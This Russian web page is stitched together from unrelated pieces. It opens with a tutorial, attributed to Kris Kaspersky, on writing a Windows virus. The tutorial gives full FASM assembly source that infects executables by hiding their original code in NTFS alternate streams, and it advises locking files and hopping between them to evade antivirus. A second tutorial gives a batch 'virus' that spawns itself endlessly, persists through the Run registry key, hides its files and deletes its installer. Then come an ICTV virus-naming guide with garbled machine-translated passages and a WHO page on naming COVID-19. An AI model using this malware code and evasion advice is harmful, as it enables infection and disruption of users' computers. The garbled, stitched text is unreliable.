Вирусы как писать: Как написать вирус для windows

Как написать вирус для windows

Конструирование вирусов — отличный стимул изучать ассемблер. И хотя вирус, в принципе, можно написать и на С, это будет как-то не по-хакерски и вообще неправильно. Следующий далее текст — заметка Криса Касперски, которая раньше не публиковалась. Из нее ты узнаешь, как создаются вирусы и как написать простой вирус для Windows при помощи FASM.

 

 

C чего начать писать вирус для windows?

Итак, давай погрузимся в мрачный лабиринт кибернетического мира, ряды обитателей которого скоро пополнятся еще одним зловредным созданием. Внедрение вируса в исполняемый файл в общем случае достаточно сложный и мучительный процесс. Как минимум для этого требуется изучить формат PE-файла и освоить десятки API-функций. Но ведь такими темпами мы не напишем вирус и за сезон, а хочется прямо здесь и сейчас. Но хакеры мы или нет? Файловая система NTFS (основная файловая система Windows) содержит потоки данных (streams), называемые также атрибутами. Внутри одного файла может существовать несколько независимых потоков данных.

Файловая система NTFS поддерживает несколько потоков в рамках одного файла

Имя потока отделяется от имени файла знаком двоеточия (:), например my_file:stream. Основное тело файла хранится в безымянном потоке, но мы также можем создавать и свои потоки. Заходим в FAR Manager, нажимаем клавиатурную комбинацию Shift + F4, вводим с клавиатуры имя файла и потока данных, например xxx:yyy, и затем вводим какой-нибудь текст. Выходим из редактора и видим файл нулевой длины с именем xxx.

Почему же файл имеет нулевую длину? А где же только что введенный нами текст? Нажмем клавишу <F4> и… действительно не увидим никакого текста. Однако ничего удивительного в этом нет. Если не указать имя потока, то файловая система отобразит основной поток, а он в данном случае пуст. Размер остальных потоков не отображается, и дотянуться до их содержимого можно, только указав имя потока явно. Таким образом, чтобы увидеть текст, необходимо ввести следующую команду: more < xxx:yyy.

Будем мыслить так: раз создание дополнительных потоков не изменяет видимых размеров файла, то пребывание в нем постороннего кода, скорее всего, останется незамеченным. Тем не менее, чтобы передать управление на свой поток, необходимо модифицировать основной поток. Контрольная сумма при этом неизбежно изменится, что наверняка не понравится антивирусным программам. Методы обмана антивирусных программ мы рассмотрим в дальнейшем, а пока определимся со стратегией внедрения.

 

Алгоритм работы вируса

Закрой руководство по формату исполняемых файлов (Portable Executable, PE). Для решения поставленной задачи оно нам не понадобится. Действовать будем так: создаем внутри инфицируемого файла дополнительный поток, копируем туда основное тело файла, а на освободившееся место записываем наш код, который делает свое черное дело и передает управление основному телу вируса.

Работать такой вирус будет только на Windows и только под NTFS. На работу с другими файловыми системами он изначально не рассчитан. Например, на разделах FAT оригинальное содержимое заражаемого файла будет попросту утеряно. То же самое произойдет, если упаковать файл с помощью ZIP или любого другого архиватора, не поддерживающего файловых потоков.

В качестве примера архиватора, поддерживающего файловые потоки, можно привести WinRAR. Вкладка «Дополнительно» в диалоговом окне «Имя и параметры архива» содержит группу опций NTFS. В составе этой группы опций есть флажок «Сохранять файловые потоки». Установи эту опцию, если при упаковке файлов, содержащих несколько потоков, требуется сохранить их все.

Архиватор RAR способен сохранять файловые потоки в процессе архивации

Теперь настал момент поговорить об антивирусных программах. Внедрить вирусное тело в файл — это всего лишь половина задачи, и притом самая простая. Теперь создатель вируса должен продумать, как защитить свое творение от всевозможных антивирусов. Эта задача не так сложна, как кажется на первый взгляд. Достаточно заблокировать файл сразу же после запуска и удерживать его в этом состоянии в течение всего сеанса работы с Windows вплоть до перезагрузки. Антивирусы просто не смогут открыть файл, а значит, не смогут обнаружить и факт его изменения. Существует множество путей блокировки — от CreateFile со сброшенным флагом dwSharedMode до LockFile/LockFileEx.

Основная ошибка большинства вирусов состоит в том, что, однажды внедрившись в файл, они сидят и покорно ждут, пока антивирус не обнаружит их и не удалит. А ведь сканирование современных винчестеров занимает значительное время, зачастую оно растягивается на многие часы. В каждый момент времени антивирус проверяет всего один файл, поэтому, если вирус ведет кочевую жизнь, мигрируя от одного файла к другому, вероятность, что его обнаружат, стремительно уменьшается.

Мы будем действовать так: внедряемся в файл, ждем 30 секунд, удаляем свое тело из файла, тут же внедряясь в другой. Чем короче период ожидания, тем выше шансы вируса остаться незамеченным, но и тем выше дисковая активность. А регулярные мигания красной лампочки без видимых причин сразу же насторожат опытных пользователей, поэтому приходится хитрить.

Например, можно вести мониторинг дисковой активности и заражать только тогда, когда происходит обращение к какому-нибудь файлу. В решении этой задачи нам поможет специализированное ПО, например монитор процессов Procmon.

 

Программный код вируса для windows

Естественные языки с описанием компьютерных алгоритмов практически никогда не справляются. Уж слишком эти языки неоднозначны и внутренне противоречивы. Поэтому, во избежание недоразумений, продублируем описание алгоритма на языке ассемблера. Вот исходный код нашего вируса.

include 'c:\fasm\INCLUDE\WIN32AX.INC'
.data
    foo db "foo",0        ; Имя временного файла
    code_name db ":bar",0 ; Имя потока, в котором будет...
    code_name_end:        ; . ..сохранено основное тело

    ; Различные текстовые строки, которые выводит вирус
    aInfected db "infected",0
    aHello db "Hello, you are hacked"

    ; Различные буфера для служебных целей
    buf rb 1000
    xxx rb 1000
.code

start:
    ; Удаляем временный файл
    push foo
    call [DeleteFile]

    ; Определяем наше имя
    push 1000
    push buf
    push 0
    call [GetModuleFileName]

    ; Считываем командную строку
    ; Ключ filename — заразить
    call [GetCommandLine]
    mov ebp, eax
    xor ebx, ebx
    mov ecx, 202A2D2Dh ;

rool:
    cmp [eax], ecx ; это '--*'?
    jz infect
    inc eax
    cmp [eax], ebx ; Конец командной строки?
    jnz rool

    ; Выводим диагностическое сообщение,
    ; подтверждая свое присутствие в файле
    push 0
    push aInfected
    push aHello
    push 0
    call [MessageBox]

    ; Добавляем к своему имени имя потока NTFS
    mov esi, code_name
    mov edi, buf
    mov ecx, 100; сode_name_end - code_name
    xor eax,eax
    repne scasb
    dec edi
    rep movsb

    ; Запускаем поток NTFS на выполнение
    push xxx
    push xxx
    push eax
    push eax
    push eax
    push eax
    push eax
    push eax
    push ebp
    push buf
    call [CreateProcess]
    jmp go2exit ; Выходим из вируса

infect:
    ; Устанавливаем eax на первый символ имени файла-жертвы
    ; (далее по тексту dst)
    add eax, 4
    xchg eax, ebp
    xor eax,eax
    inc eax

    ; Здесь можно вставить проверку dst на заражение
    ; Переименовываем dst в foo
    push foo
    push ebp
    call [MoveFile]

    ; Копируем в foo основной поток dst
    push eax
    push ebp
    push buf
    call [CopyFile]

    ; Добавляем к своему имени имя потока NTFS
    mov esi, ebp
    mov edi, buf

copy_rool:
    lodsb
    stosb
    test al,al
    jnz copy_rool
    mov esi, code_name
    dec edi

copy_rool2:
    lodsb
    stosb
    test al,al
    jnz copy_rool2

    ; Копируем foo в dst:bar
    push eax
    push buf
    push foo
    call [CopyFile]

    ; Здесь не помешает добавить коррекцию длины заражаемого файла
    ; Удаляем foo
    push foo
    call [DeleteFile]

    ; Выводим диагностическое сообщение,
    ; подтверждающее успешность заражения файла
    push 0
    push aInfected
    push ebp
    push 0
    call [MessageBox]

    ; Выход из вируса

go2exit:
    push 0
    call [ExitProcess]
. end start

 

Компиляция и тестирование вируса для windows

Для компиляции вирусного кода нам понадобится транслятор FASM, бесплатную Windows-версию которого можно найти на сайте flatassembler.net. Остальные трансляторы (MASM, TASM) тут непригодны, так как они используют совсем другой ассемблерный синтаксис.

Скачай последнюю версию FASM для Windows, распакуй архив и запусти приложение fasmw.exe. Скопируй исходный код вируса в окошко программы и выполни команды Run → Compile, а затем укажи, в какую папку сохранить скомпилированный исполняемый файл.

Запустим его на выполнение с опцией командной строки --*, вписав после нее имя файла, который требуется заразить, например notepad.exe (xcode.exe --* notepad.exe). Появление диалогового окна, показанного на рисунке, говорит, что вирус внедрен в исполняемый файл блокнота.

Диалоговое окно, свидетельствующее об успешном заражении

Если попытка заражения потерпела неудачу, первым делом необходимо убедиться, что права доступа к файлу есть. Захватывать их самостоятельно наш вирус не умеет. Во всяком случае — пока. Но вот настоящие вирусы, в отличие от нашего безобидного лабораторного создания, сделают это непременно.

Теперь запусти зараженный файл notepad.exe на исполнение. В доказательство своего существования вирус тут же выбрасывает диалоговое окно, показанное на рисунке, а после нажатия на кнопку ОK передает управление оригинальному коду программы.

Диалоговое окно, отображаемое зараженным файлом при запуске на исполнение

Чтобы не возбуждать у пользователя подозрений, настоящий вирусописатель удалит это диалоговое окно из финальной версии вируса, заменив его какой-нибудь вредоносной начинкой. Тут все зависит от вирусописательских намерений и фантазии. Например, можно перевернуть экран, сыграть над пользователем еще какую-нибудь безобидную шутку или же заняться более зловредной деятельностью вроде похищения паролей или другой конфиденциальной информации.

Зараженный файл обладает всеми необходимыми репродуктивными способностями и может заражать другие исполняемые файлы. Например, чтобы заразить игру Solitaire, следует дать команду notepad.exe --* sol.exe. Кстати говоря, ни один пользователь в здравом уме не будет самостоятельно заражать файлы через командную строку. Поэтому вирусописатель должен будет разработать процедуру поиска очередного кандидата на заражение.

До сих пор рассматриваемый вирус действительно был абсолютно безобиден. Он не размножается и не выполняет никаких злонамеренных или деструктивных действий. Ведь он создан лишь для демонстрации потенциальной опасности, подстерегающей пользователей NTFS. Исследовательская деятельность преступлением не является. Но вот если кто-то из вас решит доработать вирус так, чтобы он самостоятельно размножался и совершал вредоносные действия, то следует напомнить, что это уже станет уголовно наказуемым деянием.

Так что вместо разработки вредоносной начинки будем совершенствовать вирус в другом направлении. При повторном заражении файла текущая версия необратимо затирает оригинальный код своим телом, в результате чего файл станет неработоспособным. Вот беда! Как же ее побороть? Можно добавить проверку на зараженность перед копированием вируса в файл. Для этого следует вызвать функцию CreateFile, передать ей имя файла вместе с потоком (например, notepad.exe:bar) и проверить результат. Если файл открыть не удалось, значит, потока bar этот файл не содержит и, следовательно, он еще не заражен. Если же файл удалось успешно открыть, стоит отказаться от заражения или выбрать другой поток. Например: bar_01, bar_02, bar_03.

Еще одна проблема заключается в том, что вирус не корректирует длину целевого файла и после внедрения она станет равной 4 Кбайт (именно таков размер текущей версии исполняемого файла вируса). Это плохо, так как пользователь тут же заподозрит подвох (файл explorer.exe, занимающий 4 Кбайт, выглядит довольно забавно), занервничает и начнет запускать антивирусы. Чтобы устранить этот недостаток, можно запомнить длину инфицируемого файла перед внедрением, затем скопировать в основной поток тело вируса, открыть файл на запись и вызвать функцию SetFilePointer для установки указателя на оригинальный размер, увеличивая размер инфицированного файла до исходного значения.

Заключение

Предложенная стратегия внедрения, конечно, неидеальна, но все же это намного лучше, чем прописываться в реестре, который контролируется множеством утилит мониторинга. Наконец, чтобы не пострадать от своего же собственного вируса, каждый вирусописатель всегда должен иметь под рукой противоядие. Командный файл, приведенный в следующем листинге, извлекает оригинальное содержимое файла из потока bar и записывает его в файл reborn.exe.

more < %1:bar > reborn.exe
ECHO I’m reborn now!

Используй полученные знания с осторожностью, изучай ассемблер, не забывай мыть руки перед едой и всегда помни о том, что создание вирусов в каких-либо иных целях, кроме исследовательских, не только очень веселое, но еще и противозаконное занятие. А закон, как любил говорить один литературный персонаж, надо чтить!

Click to rate this post!

[Total: 5 Average: 5]

Как создать, написать компьютерный вирус?

Создание самых простых вирусов не требует наличия специальных сред для разработки программ. И особых знаний, кстати, тоже. Создать вирусы довольно просто, если использовать для этого командную строку. Для этого нужно немного знать синтаксис командной строки и уметь создавать .bat-файлы.

Что такое .bat-файл и как его создать?

Если очень поверхностно, то это файлы с расширением .bat. Такие файлы несут в себе команды, которые должны быть выполнены командным интерпретатором Windows. Все те команды, которые можно выполнить в окне командной строки, можно вписать в .bat-файл и запустить. Результат будет одинаковым.

Чтобы создать .bat-вирус, нам нужен обычный текстовый редактор. В идеале подойдет для этих целей Блокнот. Создав и открыв новый текстовый документ, Вам нужно вписать туда тот код(команды), которые он должен выполнить. После этого, Вам нужно с помощью меню Сохранить как сохранить этот файл, задав ему какое-либо имя с расширением .bat и указав тип файла Все файлы.

Создаем простейший вирус

В данной статье мы рассмотрим создание вируса, который после своего запуска будет бесконечно открывать окно командной строки. Бесконечно и очень быстро открывающиеся окна командной строки не дадут пользователю спокойно работать. Закрыть их всех не успеет никто и очень скоро они забьют оперативную память компьютера, что в свою очередь сильно затормозит работу компьютера, вплоть до полного зависания. Выглядеть это будет приблизительно так:

Вдобавок, мы закинем наш вирус в автозагрузку, что обеспечит автоматический запуск вируса вместе с операционной системой.

Код создаваемого вируса

Сколько программистов, столько разных решений можно придумать для каждой задачи. Я приведу один из своих методов решения такой задачи.

[code]md c:\papka
echo start c:\papka\virus.bat>c:\papka\virus.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat
attrib +r +h +s c:\papka
attrib +r +h +s c:\papka\virus.bat
start c:\papka\virus.bat
del %0[/code]

А теперь разберем сам код. Первая строчка создает папку с именем papka в корне диска C:/. Такой адрес приведен только для примера. Использование же корня папки C:/ не совсем хороший вариант для вируса. Если Вы хотите обеспечить хорошую выживаемость Вашему вирусу, лучше всего спрятать его подальше. Первую команду можно даже пропустить, если Вы закинете сам вирус в уже созданную директорию.

Вторая строчка создает файл c:\papka\virus.bat и, с помощью команды echo, вписывает в него команду start c:\papka\virus.bat. Тут нужно знать, что после знака > указывается место вывода приведенной команды. Тут Вам нужно познакомится: c:\papka\virus.bat и есть основное тело вируса. Созданный нами .bat-файл с кодом, который мы сейчас разбираем, является всего лишь установщиком нашего основного вируса. Вы можете использовать другое название и другое местоположение для вируса.

Третья строчка закидывает созданный нами во второй строчке тело вируса в автозагрузку. Для этого используется пользовательская ветка реестра, так как к ней у пользователя всегда есть доступ. А вот использовать автозагрузку компьютера не безопасно, так как пользователь может не иметь административного доступа, что вызовет ненужную ошибку.

Четвертая и пятая строка кода изменяют атрибуты вируса и папки, где хранится вирус. Данными командами, а для этого используется команда attrib, мы добавляем атрибуты Только чтение, Скрытый и Системный и для папки, и для вируса. Использование атрибута r(Только чтение) необязательно. А вот атрибуты Скрытый и Системный хорошо защитят созданный нами вирус. Если не верите, то почитайте статью про вирус, который превращает папки на флешке в ярлыки. Он использует именно эту технологию.

6-ая строчка кода запускает наш вирус. Вы можете пропустить этот пункт, если хотите, чтобы первый запуск вируса произошел только после перезагрузки компьютера.

И, наконец-то, последняя, 7-ая строчка удаляет данный .bat-вирус. Это полезно, так как по этому .bat-файлу можно спокойно выйти на созданный нами вирус и удалить его.

Смысл созданного вируса

Смысл вируса, который уместился в эти 7 строк — создать основной вирус, защитить его и обеспечить его постоянную работу. А так же подмести свои следы. А что делает основной вирус? После запуска основного вируса, он выполняет ту команду, которая вписана в нее. А это команда, в свою очередь, запускает наш вирус, который опять-таки снова запускает самого себя. И так до бесконечности.

Как бороться с такими вирусами?

Во-первых, начало борьбы с данным вирусом начнется после того, как он запуститься. Очень скоро вирус заполнит своими копиями оперативную память и Вы даже мышкой шевельнуть не сможете. Поэтому, такой спектакль нужно пресекать сразу. Для этого прекрасно подойдет кнопка Break на клавиатуре. Жмите ее столько, сколько понадобится, чтобы новые копии перестали создаваться. На клавиатурах без кнопки Break, может помочь сочетание клавиш Ctrl+C.

Как удалить такой вирус?

Вы можете найти и удалить вирус через его запись в автозагрузке(подробнее по ссылке). А так же Вы можете выйти на вирус по команде, которая будет высвечиваться в окне командного интерпретатора. Естественно, если Вы сможете добраться до скрытого и системного файла. Вот таким образом происходит создание простого вируса.

Удачи!

Как писать названия вирусов, видов и других таксонов?

Названия таксонов пишутся иначе, чем названия вирусов

Документ, содержащий эту информацию, можно скачать здесь.

Названия вирусов (вещи, с которыми вы работаете в лаборатории или от которых вы заболеваете) пишутся иначе, чем названия видов и других таксонов (логические конструкции, которые помогают нам классифицировать вирусы).

Название вида* пишется курсивом, первое слово начинается с заглавной буквы. Другие слова начинаются с заглавной буквы только в том случае, если они являются именами собственными (включая названия родов-хозяев, но не названия родов вирусов**) или алфавитными идентификаторами. Название вида не должно сокращаться. Примеры:

  • Род Ифлавирус включает вид Вирус деформации крыла.
  • Представители вида Вирус Западного Нила являются арбовирусами.
  • Вид  Неаполитанский флебовирус лихорадки москитов  включает множество разнообразных вирусов-членов.
  • Этиологические агенты полиомиелита (полиовирусы типов 1, 2 и 3) относятся к виду Enterovirus C .
  • Вирус Anadyr, вирус Batai, вирус Birao и многие другие являются представителями этого вида Ортобуньявирус Буньямвера .
  • Выделен новый бактериофаг, относящийся к виду Salmonellavirus SP6 .
  • Полиомавирус Rattus norvegicus 1 является видом семейства Polyomaviridae .

Некоторые названия родов-хозяев также могут считаться именами нарицательными в английском языке и могут быть написаны строчными буквами, если они не являются первым словом названия вида. Пример:

  • Вирус кольцевой пятнистости индийских цитрусовых

Название вируса никогда не должно быть выделено курсивом, даже если оно включает название вида или рода хозяина, и должно быть написано строчными буквами. Это гарантирует, что его можно отличить от названия вида, которое в противном случае могло бы быть идентичным. Первые буквы слов в названии вируса, включая первое слово, должны начинаться с заглавной только в том случае, если эти слова являются именами собственными (включая названия родов-хозяев, но не названия родов вирусов) или начинают предложение. Отдельные буквы в названиях вирусов, включая буквенно-цифровые обозначения штаммов, могут быть заглавными. В большинстве текстов названия вирусов используются гораздо чаще, чем названия видов, и поэтому могут быть сокращены. Примеры:

  • Были получены изоляты вируса денге 2 ….
  • Обнаружение вируса Западного Нила в сыворотке человека ….
  • Выделен фаг Salmonella SE1 ….
  • Вирус золотой мозаики Sida ciliaris (SCGMV) вызывает ….
  • Тля переносит вирус Y картофеля (PVY).

Название таксона более высокого ранга (т. е. выше ранга вида )  записывается как одно слово с суффиксом, характерным для таксона. Примеры:

царство

…вириа

подобласть

…вира

королевство

… вирусы

подцарство

…вириты

тип

… вирикота

подтип

… вирикотина

класс

… вирицеты

подкласс

…viricetidae

заказ

… вирусы

подзаказ

…virineae

семейство

…вирусы

подсемейство

…вирины

род

. ..вирус

подрод

…вирус

Как и название вида, название высшего таксона пишется курсивом и начинается с заглавной буквы. Это отличается от принятого в ботанике и зоологии, в котором названия таксонов выше уровня рода не выделены курсивом. Именам таксонов часто предшествует идентификатор уровня таксона. Примеры:

  • … новый вид рода Фабавирус
  • … члены подсемейства Comovirinae
  • …. представители семейства Secoviridae
  • Отряд Picornavirales включает вирусы, поражающие хозяев ряда видов.

Собирательное название для группы вирусов, принадлежащих к таксону более высокого уровня, не выделяется курсивом и не пишется с заглавной буквы, даже если оно образовано от имени собственного. Первая буква коллективного имени может быть заглавной, если с нее начинается предложение.

  • урмиавирусы, урмиавирус
  • вирусов Гернси распространены по всему миру.
  • Гернсивирусы распространены по всему миру.
  • апаравирусы
  • полимераза апаравируса

Обратите внимание, что если таксоны имеют одинаковую основу (например, Flavivirus и Flaviviridae ), это может привести к двусмысленности, поскольку обе группы вирусов могут называться флавивирусами. Некоторые вирусологи используют термины «стебель + вирады», «стебель + вириды», «стебель + вирин» и «стебель + вирус» для различения членов отрядов, семейств, подсемейств и родов соответственно.

Сложные примеры предложений

  • Эбола -вирус (виды Zaire Ebolavirus ; Род Эбовирус ; Семейство Filoviridae; Порядок Mononegavirales ) могут вызвать болезнь и ней.
  • Заражение личинок тутового шелкопряда Bombyx mori (семейство Bombycidae) бакуловирусом Bombyx mori nucleopolyhedrovirus (BmNPV) (вид Bombyx mori nucleopolyhedrovirus ) часто приводит к летальному исходу.
  • В семействе Podoviridae , подсемейство Autographivirinae Вместе все подовирусы, которые содержат РНК -полимеразную ген в их геноме, включая Escherichia Phage T7 (виды вирус Escherichia T7 ; Genus Teseptttimavtimavtimavtimavtrimavtrimavitir). Вирус клебсиеллы F19 ; род Drulisvirus ).
  • Артовирусы образуют семейство гапловирикотинового порядка Mononegavirales .

* Полные правила именования таксонов вирусов можно найти в Кодексе ICTV

** Имя собственное – это имя, используемое для отдельного лица, места или организации. Имя нарицательное обозначает класс объектов или понятие. Названия родов-хозяев обычно считаются именами собственными, поскольку они относятся к группе уникальных объектов, но некоторые, например «цитрусовые», стали именами нарицательными, поскольку они также могут описывать межродовые гибриды. Названия родов вирусов не считаются именами собственными, когда используются как часть названия вида или вируса, поскольку они относятся к подмножеству рода, а не к роду в целом.

Naming the coronavirus disease (COVID-19) and the virus that causes it

    • All topics »
    • A
    • B
    • C
    • D
    • E
    • F
    • G
    • H
    • I
    • J
    • K
    • L
    • M
    • N
    • O
    • P
    • Q
    • R
    • S
    • T
    • U
    • V
    • W
    • X
    • Y
    • З
    • Ресурсы »

      • Бюллетени
      • Факты в картинках
      • Мультимедиа
      • Публикации
      • Вопросы и Ответы
      • Инструменты и наборы инструментов
    • Популярный »

      • Загрязнение воздуха
      • Коронавирусная болезнь (COVID-19)
      • Гепатит
      • оспа обезьян
    • Все страны »
    • А
    • B
    • C
    • D
    • E
    • F
    • G
    • H
    • I
    • J
    • K
    • L
    • M
    • N
    • O
    • P
    • Q
    • R
    • S
    • T
    • U
    • V
    • W
    • X
    • Y
    • Z
  • 3

    3
    Регионы »

    • Африка
    • Америка
    • Юго-Восточная Азия
    • Европа
    • Восточное Средиземноморье
    • Западная часть Тихого океана
  • ВОЗ в странах »

    • Статистика
    • Стратегии сотрудничества
    • Украина ЧП
  • все новости »

    • Выпуски новостей
    • Заявления
    • Кампании
    • Комментарии
    • События
    • Тематические истории
    • Выступления
    • Прожекторы
    • Информационные бюллетени
    • Библиотека фотографий
    • Список рассылки СМИ
  • Заголовки »
  • Сконцентрируйся »

    • Афганистан кризис
    • COVID-19 пандемия
    • Кризис в Северной Эфиопии
    • Сирийский кризис
    • Украина ЧП
    • Вспышка оспы обезьян
    • Кризис Большого Африканского Рога
  • Последний »

    • Новости о вспышках болезней
    • Советы путешественникам
    • Отчеты о ситуации
    • Еженедельный эпидемиологический отчет
  • ВОЗ в чрезвычайных ситуациях »

    • Наблюдение
    • Исследовательская работа
    • Финансирование
    • Партнеры
    • Операции
    • Независимый контрольно-консультативный комитет
  • Данные ВОЗ »

    • Глобальные оценки здоровья
    • ЦУР в области здравоохранения
    • База данных о смертности
    • Сборы данных
  • Панели инструментов »

    • Информационная панель COVID-19
    • Приборная панель «Три миллиарда»
    • Монитор неравенства в отношении здоровья
  • Особенности »

    • Глобальная обсерватория здравоохранения
    • СЧЕТ
    • Инсайты и визуализации
    • Инструменты сбора данных
  • Отчеты »

    • Мировая статистика здравоохранения 2022 г.
    • избыточная смертность от COVID
    • DDI В ФОКУСЕ: 2022 г.
  • О ком »

    • Люди
    • Команды
    • Структура
    • Партнерство и сотрудничество
    • Сотрудничающие центры
    • Сети, комитеты и консультативные группы
    • Трансформация
  • Наша работа »

    • Общая программа работы
    • Академия ВОЗ
    • мероприятия
    • Инициативы
  • Финансирование »

    • Инвестиционный кейс
    • Фонд ВОЗ
  • Подотчетность »

    • Аудит
    • Бюджет
    • Финансовые отчеты
    • Портал программного бюджета
    • Отчет о результатах
  • Управление »

    • Всемирная ассамблея здравоохранения
    • Исполнительный совет
    • Выборы Генерального директора
    • Веб-сайт руководящих органов

Навигация по разделам

Объявлены официальные названия вируса, вызывающего COVID-19 (ранее известного как «новый коронавирус 2019»), и вызываемого им заболевания. Официальные названия:

Болезнь

Коронавирусная болезнь

(COVID-19)

Вирус 

тяжелый острый респираторный синдром коронавирус 2 
(SARS-CoV-2)

 

Почему вирус и болезнь имеют разные названия?

Вирусы и заболевания, которые они вызывают, часто имеют разные названия. Например, ВИЧ — это вирус, вызывающий СПИД. Люди часто знают название болезни, но не знают название вируса, который ее вызывает.

Существуют различные процессы и цели присвоения имен вирусам и болезням.

Вирусы получают названия на основе их генетической структуры, чтобы облегчить разработку диагностических тестов, вакцин и лекарств. Эту работу выполняют вирусологи и более широкое научное сообщество, поэтому названия вирусов дает Международный комитет по таксономии вирусов (ICTV).

Болезни названы так, чтобы можно было обсудить вопросы профилактики, распространения, трансмиссивности, тяжести и лечения. Обеспечение готовности человека к заболеваниям и реагирование на них — это роль ВОЗ, поэтому ВОЗ официально называет болезни в Международной классификации болезней.
болезней (МКБ).

11 февраля 2020 года ICTV объявила о названии нового вируса «тяжелый острый респираторный синдром коронавирус 2 (SARS-CoV-2)». Это название было выбрано потому, что вирус генетически связан с коронавирусом, вызывающим атипичную пневмонию.
вспышка 2003 года. Несмотря на родство, эти два вируса различаются.

11 февраля 2020 г. ВОЗ объявила название нового заболевания «COVID-19» в соответствии с рекомендациями, ранее разработанными Всемирной организацией здравоохранения животных (МЭБ) и Продовольственной и сельскохозяйственной организацией Объединенных Наций (ФАО).

  • Обращение Генерального директора ВОЗ к средствам массовой информации от 11 февраля 2020 г.
  • Доклад ВОЗ о ситуации от 11 февраля 2020 г.

ВОЗ и ICTV связались по поводу названий как вируса, так и болезни.